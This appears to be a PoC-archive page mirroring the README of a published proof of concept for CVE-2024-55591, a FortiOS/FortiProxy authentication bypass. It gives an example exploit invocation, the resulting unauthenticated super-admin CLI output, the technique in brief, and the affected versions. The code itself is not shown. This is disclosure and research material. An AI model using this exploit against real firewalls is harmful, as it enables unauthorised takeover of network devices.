Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-55591 PoC — Fortinet FortiOS和FortiProxy 安全漏洞

Source
https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591
Associated Vulnerability
Title:Fortinet FortiOS和FortiProxy 安全漏洞 (CVE-2024-55591)
Description:An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Readme

# CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Exploit Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
python CVE-2024-55591-Exploit-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) Exploit POC by watchTowr
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

```

# Description

This script is a proof of concept for CVE-2024-55591, targeting FortiOS (Fortigate) management interfaces. By creating brute forcing WebSocket connections to create a race condition along with an authentication bypass, it is possible to send FortiOS CLI commands unauthenticated. More details are described within our [blog post] (https://labs.watchtowr.com/).

# Affected Versions

* FortiOS 7.0.0 through 7.0.16
* FortiProxy 7.0.0 through 7.0.19
* FortiProxy 7.2.0 through 7.2.12

More details at [Fortinet advisory](https://www.fortiguard.com/psirt/FG-IR-24-535)

# Note

This script isn't designed to work with FortiProxy, as pre-flight checks determine if the instance is a FortiGate Management Interface, but it is assumed the underlying technique is applicable to affected FortiProxy devices.

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →